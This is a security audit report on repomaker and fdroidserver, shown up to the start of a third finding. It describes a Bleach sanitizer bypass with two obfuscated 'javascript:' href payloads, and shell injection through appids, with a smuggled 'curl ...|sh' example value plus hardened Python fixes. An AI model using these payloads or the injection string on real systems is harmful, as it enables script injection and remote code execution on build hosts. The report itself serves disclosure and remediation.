<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.8.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Findings by Threat Level</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><table style="margin-top: 15px;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>See pdf version.</div></td></tr></tbody></table>
</div>
<a name="typepie"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.8.2</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Findings by Type</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><table style="margin-top: 15px;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>See pdf version.</div></td></tr></tbody></table></div></td></tr></tbody></table></div>
</div>
</div>
</div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Executive Summary <span><span>•</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="methodology"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>2</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Methodology</div></td></tr></table></div>
<a name="planning"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>2.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Planning</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Our general approach during this code audit was as follows:</div>
<div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>1. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Scanning</span><div></div>Through the use of vulnerability scanners, all sources were tested
for vulnerabilities. The results were analyzed to determine whether any
vulnerabilities could be exploited to gain access to a target host on a
network.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>2. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Grepping</span><div></div>The source code was grepped for various expressions identifying sources of interest.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>3. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Source code reading</span><div></div>Either all of the source code or only the portions identified by scanning and grepping were analyzed for possible vulnerabilities.</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Our general approach during this penetration test was as follows:</div>
<div style="margin-left: 0.2cm; margin-bottom: 1.3cm; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>1. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Reconnaissance</span><div></div>We attempted to gather as much information as possible about the
target. Reconnaissance can take two forms: active and passive. A
passive attack is always the best starting point as this would normally defeat
intrusion detection systems and other forms of protection, etc., afforded to the
network. This would usually involve trying to discover publicly available
information by utilizing a web browser and visiting newsgroups etc. An active form
would be more intrusive and may show up in audit logs and may take the form of a
social engineering type of attack.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>2. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Enumeration</span><div></div>We used varied operating system fingerprinting tools to determine
what hosts are alive on the network and more importantly what services and operating
systems they are running. Research into these services would be carried out to
tailor the test to the discovered services.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>3. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Scanning</span><div></div>Through the use of vulnerability scanners, all discovered hosts would be tested
for vulnerabilities. The results would be analyzed to determine whether there are any
vulnerabilities that could be exploited to gain access to a target host on a
network.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>4. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Obtaining Access</span><div></div>Through the use of published exploits or weaknesses found in
applications, operating system and services access would then be attempted. This may
be done surreptitiously or by more brute force methods.</div></td></tr></table></div>
</div>
<a name="riskClassification"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>2.2</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Risk Classification</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Throughout the document, each vulnerability or risk identified has been labeled and
categorized as:</div>
<div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Extreme</span><div></div>Extreme risk of security controls being compromised with the possibility
of catastrophic financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">High</span><div></div>High risk of security controls being compromised with the potential for
significant financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Elevated</span><div></div>Elevated risk of security controls being compromised with the potential
for material financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Moderate</span><div></div>Moderate risk of security controls being compromised with the potential
for limited financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Low</span><div></div>Low risk of security controls being compromised with measurable negative
impacts as a result.</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Please note that this risk rating system was taken from the Penetration Testing Execution
Standard (PTES). For more information, see:
http://www.pentest-standard.org/index.php/Reporting.</div>
</div>
</div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Methodology <span><span>•</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="recon"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>3</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Automated Code Scans</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Automated code scans were used to obtain preliminary reports, which were then analysed to weed out false positives. Some of the reported findings originate from these scan reports.</div>
<a name="scans"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>3.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Automated Scan Tools</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">As part of our static code scanning, we used the following automated
scan tools:</div>
<div style="margin-left: 0.2cm; margin-bottom: 1.3cm; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>bandit – <a href="https://github.com/openstack/bandit" style="color: #e2632a;">https://github.com/openstack/bandit</a></div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>safety – <a href="https://pyup.io/safety/" style="color: #e2632a;">https://pyup.io/safety/</a></div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>Visual Code Grepper (VCG) – <a href="https://github.com/nccgroup/VCG" style="color: #e2632a;">https://github.com/nccgroup/VCG</a>
</div></td></tr></table></div>
</div>
</div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Automated Code Scans <span><span>•</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="techSummary"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Pentest Technical Summary</div></td></tr></table></div>
<a name="findings"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Findings</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">We have identified the following issues:</div>
<a name="f8-evasion-of-bleach-sanitizer-in-repomaker"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-001 — Evasion of Bleach Sanitizer in Repomaker</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-001</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The user input sanitizer bleach can be circumvented, so script can be injected into the browsers of users who view the descriptions of apps.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The code in ../code/repomaker/repomaker/utils.py uses bleach to sanitize untrusted input, but its check for <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">javascript:</span> URLs can be evaded with the following obfuscations (a tab character reference inside the scheme name, and a leading control character reference):</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;"><a href="javas&#x09;cript:alert(1)">alert</a>
<a href="&#14;javascript:alert(1)">alert</a></div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">High: Script can be executed in the browser of anyone viewing repomaker, and on any site that displays the package descriptions.</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">Upgrade to a version of Bleach which fixes this bug, and re-test the payloads above against the upgraded sanitizer to confirm they are neutralised.</div>
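<div style="margin-bottom: 5pt; line-height: 6mm;">As an added illustration (this is not code from repomaker or from bleach), the following Python shows why a prefix check on the raw attribute value is insufficient: browsers remove ASCII tab and newline anywhere in a URL and strip leading C0 control characters before they read the scheme, so both payloads above end up as <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">javascript:alert(1)</span>. The hardened check normalises the value the way a browser does and then allow-lists the scheme. The allow-list, the function names and the third payload variant are this example's own assumptions.</div>

```python
import html
import re

# Attribute values quoted in the finding (constructed test input), plus a
# variant of the second one with the control byte left unencoded.
PAYLOADS = [
    'javas&#x09;cript:alert(1)',     # tab character reference inside the scheme
    '&#14;javascript:alert(1)',      # leading C0 control character reference
    '\x0ejavascript:alert(1)',       # same, with the control byte unencoded
]

# Assumed allow-list; real projects tune this to what their content needs.
SAFE_SCHEMES = {'http', 'https', 'mailto'}

# WHATWG URL parsing: leading/trailing C0 controls and spaces are stripped,
# and ASCII tab/newline are removed anywhere in the input, before the scheme
# is read.  A scheme is ALPHA followed by ALPHA / DIGIT / '+' / '-' / '.'.
_C0_AND_SPACE = ''.join(chr(c) for c in range(0x21))
_TAB_NEWLINE = re.compile(r'[\t\n\r]')
_SCHEME = re.compile(r'^([A-Za-z][A-Za-z0-9+.-]*):')


def naive_is_safe_href(value):
    """Flawed check: a literal-prefix test on the raw attribute value."""
    return not value.lower().startswith('javascript:')


def browser_normalize(value):
    """Approximate what a browser does to an href before reading its scheme.
    html.unescape() already drops references to some control characters
    (such as &#14;); the strip() handles unencoded ones and spaces."""
    decoded = html.unescape(value)
    stripped = decoded.strip(_C0_AND_SPACE)
    return _TAB_NEWLINE.sub('', stripped)


def hardened_is_safe_href(value):
    """Allow-list the scheme of the normalised URL.  Scheme-less (relative)
    URLs pass; anything with a scheme outside SAFE_SCHEMES is rejected."""
    m = _SCHEME.match(browser_normalize(value))
    if m is None:
        return True
    return m.group(1).lower() in SAFE_SCHEMES


if __name__ == '__main__':
    for p in PAYLOADS:
        print(repr(p), 'naive:', naive_is_safe_href(p),
              'hardened:', hardened_is_safe_href(p))
```

<div style="margin-bottom: 5pt; line-height: 6mm;">The point of the example is the order of operations: decode and normalise first, then decide on the scheme. A filter that inspects the raw attribute bytes is reasoning about a different string from the one the browser will navigate to.</div>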
</div>
<a name="f14-shell-code-injection-via-malicious-appids-into-fdroidserver"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.2</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-002 — Shell Code Injection Via Malicious Appids Into Fdroidserver</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-002</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">It is possible to craft a malicious APK whose appid is interpolated into a shell command, allowing arbitrary code execution.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">dscanner.py</span> runs drozer in a Docker container to check an APK. It invokes <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">docker</span> through Python's <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">subprocess</span> with the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">shell=True</span> parameter, so if the appid can be chosen by an attacker it becomes part of a command line that the shell parses, and arbitrary commands can be executed.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">copy_to_container = 'docker cp "{0}" {1}:{2}'</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">    def _copy_to_container(self, src_path, dest_path):
        """
        Copies a file (presumed to be an apk) from src_path
        to home directory on container.
        """
        path = '/home/drozer/{path}.apk'.format(path=dest_path)
        command = self.Commands.copy_to_container.format(src_path,
                                                         self.container_id,
                                                         path)
        try:
            check_output(command, shell=True)
        except CalledProcessError as e:
            logging.error(('Command "{command}" failed with '
                           'error code {code}'.format(command=command,
                                                      code=e.returncode)))
            raise</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_copy_to_container()</span> is called in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_install_apk</span> like this:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">self._copy_to_container(apk_path, app_id)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_install_apk</span> is called from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">perform_drozer_scan()</span>, which is called from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">main()</span> like this:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">    for app_id, app in apps.items():
        for build in app.builds:
            apks = []
            for f in os.listdir(options.repo_path):
                n = common.get_release_filename(app, build)
                if f == n:
                    apks.append(f)
            for apk in sorted(apks):
                apk_path = os.path.join(options.repo_path, apk)
                docker.perform_drozer_scan(apk_path, app.id)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Either <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">apk_path</span> or <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">app.id</span> can be used to inject shell commands, for example <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">--help;curl https://host/evil.sh|sh;echo</span>.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">It remains to be clarified whether appids are subject to any constraints. In this regard we found the following ways an appid is constructed in fdroidserver:</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">in common.py:545:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">publish_name_regex = re.compile(r"^(.+)_([0-9]+)\.(apk|zip)$")</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">later starting line 561 this regular expression is used like this:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">def publishednameinfo(filename):
    filename = os.path.basename(filename)
    m = publish_name_regex.match(filename)
    try:
        result = (m.group(1), m.group(2))
    except AttributeError:
        raise FDroidException(_("Invalid name for published file: %s") % filename)
    return result</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In metadata.py the appid is derived from the metadata file name, so it must at least be a valid file name:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid, _ignored = fdroidserver.common.get_extension(os.path.basename(metadatapath))</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Later in metadata.py appid is taken from manifest.xml:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid = manifestroot.attrib['package']</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In signatures.py appid is resolved by <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">aapt</span> with this call:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid, vercode, _ignored = common.get_apk_id_aapt(apkpath)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">common.get_apk_id_aapt is implemented as follows:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">def get_apk_id_aapt(apkfile):
    """Extrat identification information from APK using aapt.
    :param apkfile: path to an APK file.
    :returns: triplet (appid, version code, version name)
    """
    r = re.compile("package: name='(?P<appid>.*)' versionCode='(?P<vercode>.*)' versionName='(?P<vername>.*)' platformBuildVersionName='.*'")
    p = SdkToolsPopen(['aapt', 'dump', 'badging', apkfile], output=False)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In update.py an appid is read as a line of text:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid = line.rstrip()</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">None of the above ways of resolving the appid restricts it to a safe character set, so it appears possible to construct malicious appids that lead to arbitrary code execution in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">dscanner.py</span>.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: Arbitrary Code Execution on the fdroid build host.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate appids against the Android package-name format before using them, and stop passing attacker-influenced values through a shell: build the docker command as an argument list and call <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">subprocess</span> without <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">shell=True</span>.</div></div>
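<div style="margin-bottom: 5pt; line-height: 6mm;">The following added example (not fdroidserver's code) reproduces the vulnerable construction with <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">echo</span> standing in for <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">docker</span>, so that it runs without Docker and the injected command only prints a marker, and places two hardened variants beside it: passing an argument vector without <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">shell=True</span>, which makes the appid a single literal argument whatever it contains, and rejecting appids that do not match the Android package-name grammar (two or more dot-separated Java identifier segments) as defence in depth. The container id, paths and the regular expression are this example's own assumptions.</div>

```python
import re
import subprocess

# The vulnerable pattern from dscanner.py: a format string handed to a shell.
# The tool name is a parameter so the demonstration can substitute 'echo'
# for 'docker' and run on any POSIX host.
COPY_TO_CONTAINER = '{tool} cp "{src}" {container}:{dest}'

# Assumed definition of a valid appid: an Android package name, i.e. two or
# more dot-separated segments that are each a Java identifier.
APPID_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)+$')

# Constructed inputs: the injection only echoes a marker.
MALICIOUS_APPID = 'org.example.app;echo INJECTED;echo '
BENIGN_APPID = 'org.fdroid.fdroid'


def is_valid_appid(app_id):
    return APPID_RE.match(app_id) is not None


def container_path(app_id):
    return '/home/drozer/{path}.apk'.format(path=app_id)


def vulnerable_copy(src_path, container_id, app_id, tool='docker'):
    """Mirrors _copy_to_container(): the appid lands unquoted in a string
    that /bin/sh parses, so ';', '|', '$(...)' inside it run as commands."""
    command = COPY_TO_CONTAINER.format(tool=tool, src=src_path,
                                       container=container_id,
                                       dest=container_path(app_id))
    return subprocess.check_output(command, shell=True).decode()


def hardened_argv(src_path, container_id, app_id, tool='docker'):
    """Refuse anything that is not a package name, then build an argument
    vector.  With a list and no shell=True, no shell ever parses the values."""
    if not is_valid_appid(app_id):
        raise ValueError('refusing suspicious appid: %r' % app_id)
    return [tool, 'cp', src_path,
            '%s:%s' % (container_id, container_path(app_id))]


def hardened_copy(src_path, container_id, app_id, tool='docker'):
    return subprocess.check_output(
        hardened_argv(src_path, container_id, app_id, tool)).decode()


def demo():
    """Run three variants with 'echo' standing in for 'docker':
    the vulnerable string (injection fires), the argv form with the same
    malicious appid but no validation (appid stays one literal argument),
    and the fully hardened call with a benign appid."""
    injected = vulnerable_copy('/tmp/app.apk', 'c0ffee', MALICIOUS_APPID,
                               tool='echo')
    literal = subprocess.check_output(
        ['echo', 'cp', '/tmp/app.apk',
         'c0ffee:' + container_path(MALICIOUS_APPID)]).decode()
    safe = hardened_copy('/tmp/app.apk', 'c0ffee', BENIGN_APPID, tool='echo')
    return injected, literal, safe


if __name__ == '__main__':
    for label, out in zip(('vulnerable', 'argv only', 'hardened'), demo()):
        print('%s:\n%s' % (label, out))
```

<div style="margin-bottom: 5pt; line-height: 6mm;">The argument-vector form is the structural fix; the appid regex is a second line of defence that also catches values other parts of fdroidserver would accept unchanged. Neither replaces the other, since the same appid also reaches aapt, file names and metadata paths.</div>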
</div>
<a name="f23-code-injection-in-fdroidserver-metadata-yaml-parsing"></a><div style="margin-bottom: 1.3cm;">
